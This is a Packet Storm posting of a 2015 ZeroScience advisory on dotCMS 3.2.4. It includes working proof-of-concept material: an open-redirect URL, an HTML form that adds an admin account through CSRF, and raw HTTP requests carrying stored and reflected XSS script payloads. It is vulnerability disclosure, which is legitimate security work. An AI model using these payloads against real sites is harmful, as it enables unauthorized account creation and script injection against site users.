exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dotCMS 3.2.4 CSRF / XSS / Open Redirect

dotCMS 3.2.4 CSRF / XSS / Open Redirect
Posted Dec 8, 2015
Authored by LiquidWorm | Site zeroscience.mk

dotCMS version 3.2.4 suffers from cross site request forgery, cross site scripting, and open redirection vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | bbb9a245c1b76c149bcb358364c5ed5c4fd2bf936261edd5c955bc0351dc7cb1
Download | Favorite | View

dotCMS 3.2.4 CSRF / XSS / Open Redirect

Change Mirror Download

dotCMS 3.2.4 Multiple Vulnerabilities


Vendor: dotCMS Software, LLC
Product web page: http://www.dotcms.com
Affected version: 3.2.4 (Enterprise)

Summary: DotCMS is the next generation of Content Management System (CMS).
Quick to deploy, open source, Java-based, open APIs, extensible and massively
scalable, dotCMS can rapidly deliver personalized, engaging multi-channel
sites, web apps, campaigns, one-pagers, intranets - all types of content
driven experiences - without calling in your developers.

Desc: The application suffers from multiple security vulnerabilities including:
Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request
Forgery (CSRF).

Tested on: Apache-Coyote/1.1


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5290
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php

Vendor: http://dotcms.com/docs/latest/change-log
        https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305
        https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3


19.11.2015

--


1. Open Redirect via '_EXT_LANG_redirect' GET parameter:
--------------------------------------------------------

http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia



2. CSRF Add Admin:
------------------

<html>
  <body>
    <form action="http://127.0.0.1/dwr/call/plaincall/UserAjax.addUser.dwr" method="POST" enctype="text/plain">
      <input type="hidden" name="callCount" value="1
windowName=c0-param2
c0-scriptName=UserAjax
c0-methodName=addUser
c0-id=0
c0-param0=null:null
c0-param1=string:TEST2
c0-param2=string:AAAA2
c0-param3=string:AAA2%40bb.net
c0-param4=string:123123
batchId=3
instanceId=0
page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1448026121316
scriptSessionId=hd2XkJoJcyP9lEk5N8qUe*ouv5l/mn17B5l-IA*1ZViJ6
" />
      <input type="submit" value="Tutaj" />
    </form>
  </body>
</html>



3. Multiple Stored And Reflected XSS:
-------------------------------------

POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1
Host: 127.0.0.1

callCount=1
windowName=c0-param0
c0-scriptName=TagAjax
c0-methodName=addTag
c0-id=0
c0-param0=<script>alert(1)<%2fscript>
c0-param1=string:
c0-param2=string:48190c8c-42c4-46af-8d1a-0cd5db894797%20
batchId=2
instanceId=0
......



POST /dwr/call/plaincall/CategoryAjax.saveOrUpdateCategory.dwr HTTP/1.1
Host: 127.0.0.1

callCount=1
windowName=c0-param5
c0-scriptName=CategoryAjax
c0-methodName=saveOrUpdateCategory
c0-id=0
c0-param0=boolean:true
c0-param1=null:null
c0-param2=<script>alert(2)<%2fscript>
c0-param3=string:ppp
c0-param4=string:aaa
c0-param5=string:bbb
batchId=2
instanceId=0
......



POST /c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/1.1
Host: 127.0.0.1

query=aaaa
offset="><script>alert(3)<%2fscript>
limit=20
sort=1
userid=admin
reindexResults=true
......



http://127.0.0.1/DotAjaxDirector/com.dotmarketing.portlets.osgi.AJAX.OSGIAJAX [jar parameter]
http://127.0.0.1/api/portlet/ES_SEARCH_PORTLET/render [URL path filename]
http://127.0.0.1/c/portal/layout [limit parameter]
http://127.0.0.1/c/portal/layout [offset parameter]
http://127.0.0.1/c/portal/layout [query parameter]
http://127.0.0.1/c/portal/layout [sort parameter]
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testIndex parameter]
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter]
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close